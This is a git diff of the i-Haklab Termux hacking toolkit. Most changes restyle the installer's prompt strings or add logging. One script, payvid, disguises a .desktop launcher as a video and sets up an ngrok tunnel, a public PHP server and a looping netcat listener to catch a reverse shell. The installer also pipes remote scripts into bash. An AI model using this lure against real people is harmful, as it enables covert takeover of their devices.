+[[ -e $TOOLS/burpsuite.jar ]] || { printf >&2 "\$R(_➤)\$W Burpsuite is not installed...\$R aborting.\$W";exit;}
+[[ \$(file \$TMPDIR/*|grep -o "socket") >/dev/null ]] || { printf >&2 "\$R(_➤)\$W Termux:Wayland server isn't running...\$R aborting.\$W";exit;}
 export DISPLAY=:0
 umask 000
 exec \$(command -v java) --add-opens=java.desktop/javax.swing=ALL-UNNAMED --add-opens=java.base/java.lang=ALL-UNNAMED -jar $TOOLS/burpsuite.jar
@@ -672,10 +672,10 @@ CONF
 			checkpkg=${ipkg%/*}
 			if [[ "$checkpkg" == "$pkg" ]]
 			then
-				printf "$G\n(_>)─➤ Package $pkg installed successfully.$W\n"
+				printf "$G\n(_➤) Package $pkg installed successfully.$W\n"
 				continue
 			else
-				printf "$R\n(_>)─➤ Error installing $pkg, Aborting...$W\n";exit
+				printf "$R\n(_➤) Error installing $pkg, Aborting...$W\n";exit
 			fi
 		done
 		mkdir -p $HOME/{Desktop,Downloads,Templates,Public,Documents,Pictures,Video}
@@ -743,7 +743,7 @@ if [ -d \$PREFIX/opt/john ];then
 	cd \$PREFIX/opt/john
 	./john \$@
 else
-	printf \"\$R(_>)─➤\$W JohnTheRipper is not installed\$W\"
+	printf \"\$R(_➤)\$W JohnTheRipper is not installed\$W\"
 fi
 #            i-Haklab by @Ivam3" > $HOME/.local/bin/john
 		chmod +x $HOME/.local/bin/john
@@ -782,8 +782,8 @@ fi
 			rm -rf $TMPDIR/$1-stable-linux-$arch.zip
 			printf "#!/bin/bash\n#THIS SCRIPT EXECUTE NGROK TO AVOID 'bad address' ERROR\nexec termux-chroot $HOME/.ngrok2/ngrok \${@:1}\n#     i-Haklab by Ivam3" > $HOME/.local/bin/$1.io
 			chmod +x ~/.ngrok2/$1 $HOME/.local/bin/$1.io
-			PS3="(_>)─➤ "
-			printf "$Y(_>)─➤$W $toInstall needs an authtoken from $1.com$Y\n"
+			PS3="(_➤) "
+			printf "$Y(_➤)$W $toInstall needs an authtoken from $1.com$Y\n"
 			select way in Set_authtoken Skip_this_step;do
 				case $way in
 					Set_authtoken)
@@ -794,7 +794,7 @@ fi
 						break
 						;;
 					*)
-						printf "$Y(_>)─➤$W Don't forget set your token running:$Y\n ╰─────➤$W $toInstall authtoken <your-token>";exit
+						printf "$Y(_➤)$W Don't forget set your token running:$Y\n ╰─────➤$W $toInstall authtoken <your-token>";exit
 						;;
 				esac
 			done
@@ -1017,7 +1017,7 @@ CONF
 					fi
 		done
 		git clone --quiet --depth 1 $msfGit $msfDir
-		[[ -d $msfDir ]] || { printf "$R\n(_>)─➤$W Metasploit directory missing...$R Aborting.$W";exit;}
+		[[ -d $msfDir ]] || { printf "$R\n(_➤)$W Metasploit directory missing...$R Aborting.$W";exit;}
 		cd $msfDir
 		sed -i "5a gem 'net-smtp', require: false" $msfDir/Gemfile
 		gem install --no-document --verbose rubygems-update
@@ -1121,7 +1121,7 @@ EOF
 		   exec ruby $TOOLS/whatWeb/whatweb \${@:1}
 		   popd
 	   else
-	           printf \"\$R(_>)─➤\$W Whatweb is not installed.\"
+	           printf \"\$R(_➤)\$W Whatweb is not installed.\"
 		   exit
 	    fi
 	    #                       i-Haklab by @Ivam3" > $HOME/.local/bin/$toInstall
@@ -1327,7 +1327,7 @@ EOF
                         CMDLINE="PATH=$PATH:$SYSXBIN:$SYSBIN;$LDLP;HOME=$ROOT_HOME;cd $PWD"
 
                         #set root user enviroment
-                        printf "$G(_>)─➤$W Build root enviroment ..";
+                        printf "$G(_➤)$W Build root enviroment ..";
                         wget -q $iHDB/.set/bin/$1 -O $HOME/.local/bin
                         if [ -e ~/.suroot/.bashrc ];then
                                 for opt in 1 2 3 4;do
@@ -1335,7 +1335,7 @@ EOF
                                                 let try=opt++
                                                 sudo chown $USER:$USER -R ~/.suroot
                                                 if [ $try -gt 3 ];then
-                                                        printf "$R. DENIED$Y\n(_>)─➤$W to fix it try 'chmod $USER:$USER -R ~/.suroot' and reinstall\n";Err
+                                                        printf "$R. DENIED$Y\n(_➤)$W to fix it try 'chmod $USER:$USER -R ~/.suroot' and reinstall\n";Err
                                                 fi
                                         fi
                                 done
@@ -1389,13 +1389,13 @@ EOF
                 fi
                 ;;
 	*)
-		printf "$R(_>)─➤$W Unable to locate $toInstall on i-Haklab\n"
+		printf "$R(_➤)$W Unable to locate $toInstall on i-Haklab\n"
 		sleep 0.5
-		printf "$G(_>)─➤$W Trying with Advance Packect Tool (APT)...\n"
+		printf "$G(_➤)$W Trying with Advance Packect Tool (APT)...\n"
 		if [[ $(pkg list-all|grep -oE "$toInstall") ]];then
 			yes|apt install $toInstall
 		else
-			printf "$R(_>)─➤$W Tool $toInstall doesn't exist\n"
+			printf "$R(_➤)$W Tool $toInstall doesn't exist\n"
 			exit
 		fi
 		;;
diff --git a/.set/share/payvid b/.set/share/payvid
--- a/.set/share/payvid
+++ b/.set/share/payvid
@@ -9,23 +9,23 @@ ctrl_c(){ killps;}
 
 printf "$G(_>)_Set_video$W\n"
 while read -p " ╰───➤ " realVID  && [ -z $realVID ] || [ ! -e $realVID ];do
-	printf "$R(_>)─➤$W Not such file $R|$W Try again.\n"
+	printf "$R(_➤)$W Not such file $R|$W Try again.\n"
 done
 cp $realVID $TMPDIR
 fakeVID=$(ls $realVID|awk -F '/' '{print $NF}')_vid
 
-printf "$G(_>)─➤$W running ngrok server"
+printf "$G(_➤)$W running ngrok server"
 exec ngrok -tcp 4546 >/dev/null >2/dev/null &
 sleep 15
 revHOST=$(curl -sSL http://localhost:4040/api/tunnels|cut -d '"' -f14|awk -F "/" '{print $3}'|cut -d ":" -f1)
 revPORT=$(curl -sSL http://localhost:4040/api/tunnels|cut -d '"' -f14|awk -F "/" '{print $3}'|cut -d ":" -f2)
-[[ -z $revHOST ]] && { printf >&2 "$R\n(_>)─➤ ERROR :$W ngrok tunnel failed\n";exit;}
+[[ -z $revHOST ]] && { printf >&2 "$R\n(_➤) ERROR :$W ngrok tunnel failed\n";exit;}
 
-printf "$G(_>)─➤$W running php server over tun0."
+printf "$G(_➤)$W running php server over tun0."
 exec lt -h "http://localtunnel.me" -p 4545 -s mis-videos >/dev/null 2>/dev/null &
 exec php -S 127.0.0.1:4545 -t $TMPDIR
 
-printf "$G(_>)─➤$W creating fake video."
+printf "$G(_➤)$W creating fake video."
 cat <<- CONF > $iHAKLAB/$fakeVID.desktop
 #!/usr/bin/env xdg-open
 
@@ -39,7 +39,7 @@ Icon=video-x-generic
 CONF
 printf "$G ╰─DONE──➤$W $iHAKLAB/$fakeVID.desktop"
 
-printf "$G(_>)─➤$W running netcat."
+printf "$G(_➤)$W running netcat."
 while true;do
 	nc -nvlp 4546
 done
diff --git a/.set/share/upgrade b/.set/share/upgrade
--- a/.set/share/upgrade
+++ b/.set/share/upgrade
@@ -18,7 +18,7 @@ W='\033[0m'
 binTools=$(ls $HOME/.local/share/i-Haklab/.set/bin)
 ctrl_c() { printf "$Y\t\t   [¿] Need a help [?]$B\n\t\tTelegram : t.me/Ivam3_Bot$W\n";}
 
-printf "$Y(_>)─➤$W Removing oldest i-Haklab version\n";$s5
+printf "$Y(_➤)$W Removing oldest i-Haklab version\n";$s5
 [[ -e $PREFIX/etc/apt/sources.list.d/abhacker.repo.list ]] && rm -rf $PREFIX/etc/apt/sources.list.d/abhacker.repo.list
 [[ -d $PREFIX/libexec/banner ]] && rm -rf $PREFIX/libexec/banner
 [[ -e $PREFIX/var/log/login-termux ]] && rm $PREFIX/var/log/login-termux
@@ -27,9 +27,9 @@ for v in ${binTools[*]};do
 	[[ -e $PREFIX/bin/$v ]] && rm $PREFIX/bin/$v
 done
 
-printf "$Y(_>)─➤$W Installing newest i-Haklab version\n"
+printf "$Y(_➤)$W Installing newest i-Haklab version\n"
 git clone --quiet https://github.com/ivam3/i-Haklab.git ~/.local/share/iHaklab
-[[ -d $HOME/.local/share/iHaklab ]] && rm -rf $HOME/.local/share/i-Haklab;mv ~/.local/share/iHaklab ~/.local/share/i-Haklab || { printf "$R(_>)─➤$W i-Haklab directory missing..$R Aborting.$W";exit;}
+[[ -d $HOME/.local/share/iHaklab ]] && rm -rf $HOME/.local/share/i-Haklab;mv ~/.local/share/iHaklab ~/.local/share/i-Haklab || { printf "$R(_➤)$W i-Haklab directory missing..$R Aborting.$W";exit;}
 source $HOME/.local/share/i-Haklab/.set/var/variables
 source $iHAKLAB/.set/functions/functions
 mkdir -p ~/.local/{etc/i-Haklab,etc/fish,lib,share,tools,var/service/www}
@@ -41,7 +41,7 @@ done
 command -v pulseaudio >/dev/null || yes|apt install pulseaudio
 
 #UPGRADE OMF
-printf "$Y(_>)─➤$W Reconfigure startup settings\n";$s5
+printf "$Y(_➤)$W Reconfigure startup settings\n";$s5
 cat <<- CONF > $HOME/.local/etc/fish/config.fish
 if status --is-login
 bash /data/data/com.termux/files/home/.local/etc/i-Haklab/wall-banner
@@ -128,18 +128,18 @@ printf "SXZhbTNieUNpbmRlcmVsbGEK" > $HOME/.local/etc/i-Haklab/.Cinderella
 chmod -w $HOME/.local/etc/i-Haklab/.Cinderella
 
 ######### Upgrading executables #########
-printf "$Y(_>)─➤$W Upgrading commands. . .$W\n";$s5
+printf "$Y(_➤)$W Upgrading commands. . .$W\n";$s5
 chmod 750 $iHAKLAB/.set/bin/*
 [[ -h $HOME/.local/bin ]] || ln -s $iHAKLAB/.set/bin $HOME/.local/bin
 
-printf "$G(_>)─➤$W Setting i-Haklab style.\n";$s5
+printf "$G(_➤)$W Setting i-Haklab style.\n";$s5
 [[ -d ~/.termux ]] || mkdir -p ~/.termux
 for i in $(ls $iHAKLAB/.set/to-install/.termux);do
 	wget -q --tries=20 $iHDB/to-install/.termux/$i -O ~/.termux/$i
 done
 [[ -e ~/.termux/shell ]] || ln -s $PREFIX/bin/fish ~/.termux/shell
 
-printf "$G(_>)─➤$W Installing NANO and VIM predictable text.\n";$s5
+printf "$G(_➤)$W Installing NANO and VIM predictable text.\n";$s5
 cat <<- CONF > $HOME/.nanorc
 set linenumbers
 set historylog
@@ -163,7 +163,7 @@ if [[ -d $TMPDIR/iHaklabvim ]];then
 	mv $(find $TMPDIR/iHaklabvim -type d -iname "vim") ~/.vim
 	mv $(find $TMPDIR/iHaklabvim/ -type f -iname ".vimrc") ~/
 else
-	printf "$R(_>)─➤ ERROR while setup vim editor$W"
+	printf "$R(_➤) ERROR while setup vim editor$W"
 fi
 rm -rf $TMPDIR/iHaklabvim.zip
 rm -rf $TMPDIR/iHaklabvim
@@ -171,7 +171,7 @@ vim +PlugUpdate +x +x 2>/dev/null
 
 bash $HOME/.local/etc/i-Haklab/wall-banner
 printf "$G
-(_>)─➤$W i-Haklab upgraded at version 3.0$G
+(_➤)$W i-Haklab upgraded at version 3.0$G
  ╰─────$Y~☆ New features:$G
  ╰──────────$Y~☆$W code cleaner that optimizes the use of RAM$G
  ╰──────────$Y~☆$W obsolete tools removed$G
diff --git a/setup b/setup
--- a/setup
+++ b/setup
@@ -4,7 +4,7 @@ IFS=$'\n\t'
 trap ctrl_c 2
 ctrl_c() { printf "$Y\n   [¿] Need a help [?]$B\nTelegram : t.me/Ivam3_Bot$W\n";}
 while [ ! -d ~/i-Haklab ] && [ $PWD != ~/i-Haklab ];do
-	printf "$R\n(_>)─➤$W i-Haklab must to be in HOME path.\n"
+	printf "$R\n(_➤)$W i-Haklab must to be in HOME path.\n"
 	ctrl_c;exit
 done
 printf "Running...";sleep 0.5
@@ -12,7 +12,7 @@ printf "Running...";sleep 0.5
 [[ -d ~/.config/fish ]] && rm -rf ~/.config/fish
 [[ -d $PREFIX/share/i-Haklab ]] && rm -rf $PREFIX/share/i-Haklab
 [[ -d ~/java ]] && rm -rf ~/java
-mkdir -p ~/.local/{etc/i-Haklab,etc/fish,lib,share,tools,var/service/www}
+mkdir -p ~/.local/{etc/i-Haklab,etc/fish,lib,share,tools,var/service/www,var/log}
 cp -r ~/i-Haklab $HOME/.local/share
 source $HOME/.local/share/i-Haklab/.set/var/variables
 source $iHAKLAB/.set/functions/functions
@@ -20,14 +20,14 @@ chk-Cuser
 clear;banner;sleep 0.5
 if command -v fish >/dev/null;then yes|apt remove fish && apt autoremove; fi
 
-printf "$Y\n(_>)─➤$W Head to app configuration and provides storage permissions to termux.$Y\n ╰─➤$W when finished$G press enter\n$W"
+printf "$Y\n(_➤)$W Head to app configuration and provides storage permissions to termux.$Y\n ╰─➤$W when finished$G press enter\n$W"
 read enter
 
 #::::::::::Installation of dependencies::::::::::::#
-printf "$G(_>)─➤$W Upgrading and installing Termux packages.\n"
+printf "$G(_➤)$W Upgrading and installing Termux packages.\n"
 APTupdate
-apt list|awk -F "/" '{print $1}' > $TMPDIR/alltools.tmp
-pkg list-installed|awk -F "/" '{print $1}' > $TMPDIR/installed.tmp
+apt list 2>/dev/null|awk -F "/" '{print $1}' > $TMPDIR/alltools.tmp
+pkg list-installed 2>/dev/null|awk -F "/" '{print $1}' > $TMPDIR/installed.tmp
 for repo in $(cat $iHAKLAB/.set/to-install/listOfpkg); do
 	GOTIT=$(grep -oE $repo $TMPDIR/installed.tmp)
 	PKG=$(grep -o $repo $TMPDIR/alltools.tmp)
@@ -36,28 +36,29 @@ for repo in $(cat $iHAKLAB/.set/to-install/listOfpkg); do
 	elif [ ! -z "$PKG" ] && [ ! -z "$GOTIT" ]; then
 		continue
 	else
-		printf "$R(_>)─➤$W The repository $repo is not candidate.\n"
+		printf "$R(_➤)$W The repository $repo is not candidate.\n"
 		sleep 1
 	fi
 done
+running 3
 yes|apt install $(cat $TMPDIR/toInstallList.tmp)
 rm -rf $TMPDIR/*.tmp
 
 #::: UPDATING LOCATE DATA BASE :::#
-printf "$G\n(_>)─➤$W Updating data base."
+printf "$G\n(_➤)$W Updating data base."
 updatedb
 
-printf "$G\n(_>)─➤$W Installing required python modules.\n"
+printf "$G\n(_➤)$W Installing required python modules.\n"
 for v in python python2 ; do
-	$v -m pip --no-color --quiet --no-cache-dir install --upgrade pip 2>/dev/null
+	$v -m pip --no-color --quiet --no-cache-dir install --upgrade pip 2>>$LOGFILE
 done
 for module in trufflehog wheel speedtest-cli scapy wfuzz h8mail objection frida;do
-	python -m pip --no-color --quiet --no-cache-dir install $module 
+	python -m pip --no-color --quiet --no-cache-dir install $module 2>>$LOGFILE
 done
 
 #::::::::::Definition of variable TOOLS::::::::::::#
-printf "$G\n(_>)─➤ Getting access to external storage...$W"
-printf "$Y\n(_>)─➤$W Access..";
+printf "$G\n(_➤) Getting access to external storage...$W"
+printf "$Y\n(_➤)$W Access..";
 sleep 0.5
 if [ -w $TOOLS ];then
 	printf "$G. DONE||$W\n"
@@ -96,14 +97,14 @@ printf "SXZhbTNieUNpbmRlcmVsbGEK" > $HOME/.local/etc/i-Haklab/.Cinderella
 chmod -w $HOME/.local/etc/i-Haklab/.Cinderella
 
 #::::::::::Insatalling i-Haklab tools::::::::::::#
-printf "$G\n(_>)─➤$W Installing principal external tools."
+printf "$G\n(_➤)$W Installing principal external tools."
 chmod 750 $iHAKLAB/.set/bin/*
 ln -s $iHAKLAB/.set/bin $HOME/.local/bin
 
-printf "$G\n(_>)─➤$W Installing Python Exploit Development Assistance for GDB."
+printf "$G\n(_➤)$W Installing Python Exploit Development Assistance for GDB."
 curl -Ls ${iHDB}/to-install/gdb_peda.sh|bash
 
-printf "$G\n(_>)─➤$W Set nano configuration..."
+printf "$G\n(_➤)$W Set nano configuration..."
 cat <<- CONF > $HOME/.nanorc
 set linenumbers
 set historylog
@@ -120,7 +121,7 @@ set softwrap
 #set nohelp
 CONF
 
-printf "$G\n(_>)─➤$W Installing VIM predictable text."
+printf "$G\n(_➤)$W Installing VIM predictable text."
 [[ -d ~/.vim ]] && rm -rf ~/.vim
 wget -q --tries=20 ${iHDB}/to-install/iHaklabvim.zip -O $TMPDIR/iHaklabvim.zip
 unzip -q $TMPDIR/iHaklabvim.zip -d $TMPDIR
@@ -128,13 +129,13 @@ if [[ -d $TMPDIR/iHaklabvim ]];then
 	mv $(find $TMPDIR/iHaklabvim -type d -iname "vim") ~/.vim
 	mv $(find $TMPDIR/iHaklabvim/ -type f -iname ".vimrc") ~/
 else
-	printf "$R(_>)─➤ ERROR while setup vim editor$W"
+	printf "$R(_➤) ERROR while setup vim editor$W"
 fi
 rm -rf $TMPDIR/iHaklabvim.zip
 rm -rf $TMPDIR/iHaklabvim
-vim +PlugUpdate +x +x 2>/dev/null
+vim +PlugUpdate +x +x 2>>$LOGFILE
 
-printf "$G\n(_>)─➤$W Setting i-Haklab style."
+printf "$G\n(_➤)$W Setting i-Haklab style."
 [[ -d ~/.termux ]] || mkdir -p ~/.termux
 for i in $(ls $iHAKLAB/.set/to-install/.termux/);do
 	wget -q --tries=20 ${iHDB}/to-install/$i -O ~/.termux/$i
@@ -187,7 +188,7 @@ for TOOL in DoS-A-Tool ExiF localtunnel-server ngrok;do
 done
 
 #::::::::::Installation of Ohmyfish::::::::::::#
-printf "$G\n(_>)─➤ Installing interactive shell.$W\n"
+printf "$G\n(_➤) Installing interactive shell.$W\n"
 [[ -d ~/.local/share/omf ]] && rm -rf ~/.local/share/omf
 [[ -d ~/.config/omf ]] && rm -rf ~/.config/omf/
 git config --global core.autocrlf
@@ -223,24 +224,24 @@ cat <<- CONF > $TMP_fish
 #!/bin/env fish
 omf install bira
 CONF
-fish $TMP_fish >/dev/null 2>&1
+fish $TMP_fish &>/dev/null 2>>$LOGFILE
 cat <<- CONF > $HOME/.bashrc
 export PATH=$HOME/.local/bin:$PREFIX/bin
 export LD_LIBRARY_PATH=$HOME/.local/lib:$PREFIX/lib
 [[ ! \$(grep -oE "i-Haklab" $PREFIX/etc/fish/config.fish >/dev/null) ]] && rm -rf $PREFIX/etc/fish/config.fish;ln -s $HOME/.local/etc/fish/config.fish $PREFIX/etc/fish/config.fish
-[[ -d ~/.local/share/i-Haklab ]] || { printf >&2 "[+] i-Haklab main directory missing, restoring (It could take a while)...\\n";yes|apt install git;git clone --quiet https://github.com/ivam3/i-Haklab ~/.local/share/i-Haklab;}
+[[ -d ~/.local/share/i-Haklab ]] || { printf >&2 "[+] i-Haklab main directory missing, restoring (It could take a while)...\\n";yes|apt install git;git clone --quiet https://github.com/ivam3/i-Haklab ~/.local/share/i-Haklab &U chmod +x -R ~/.local/share/i-Haklab;}
 chsh -s fish
 exit
 CONF
-printf "$Y\n(_>)─➤ Now you will see a PS1 as '⋊> ~/i-Haklab on master ⨯'\n ╰─➤ when it happen hold on for one minute and then type exit to continue$W\n"
-curl -Ls $iHDB/to-install/get.oh-my.fish|fish
+printf "$Y\n(_➤) Now you will see a PS1 as '⋊> ~/i-Haklab on master ⨯'\n ╰─➤ when it happen hold on for one minute and then type exit to continue$W\n"
+curl -Ls $iHDB/to-install/get.oh-my.fish|fish &>/dev/null 2>>$LOGFILE
 
 bash $iHAKLAB/.set/share/review #LOGFILE
 [[ -d ~/i-Haklab ]] && rm -rf ~/i-Haklab
 
 printf "$G\n\n
-(_>)─➤$W i-Haklab installed !!!$Y\n
-(_>)─➤$W Main commands$Y
+(_➤)$W i-Haklab installed !!!$Y\n
+(_➤)$W Main commands$Y
  ╰────────➤ run:$W i-Haklab -h :───────────:to automate process$Y
  ╰────────➤ run:$W run <name of tool> :────:to execute installed tool$Y
  ╰────────➤ run:$W omf theme :─────────────:to change a theme$Y
@@ -258,7 +259,7 @@ printf "$G\n\n
  ╰────────➤ run:$W vncserver :─────────────:to init graphical enviroment on vnc app$Y
  ╰────────➤ run:$W sudo <some commands> :──:to run commands as super user whithout rooted device$Y
  ╰────────➤ run:$W i-Haklab about i-Haklab :for all usage guide$G
-(_>)─➤$W To fix issues going to$B t.me/Ivam3_Bot$G
-(_>)─➤$W press$G enter$W to reestart Termux\n"
-read enter;exec reset
+(_➤)$W To fix issues going to$B t.me/Ivam3_Bot$G
+(_➤)$W press$G enter$W to reestart Termux\n"
+read enter;termux-reload-settings;exec reset
 #		i-Haklab by @Ivam3
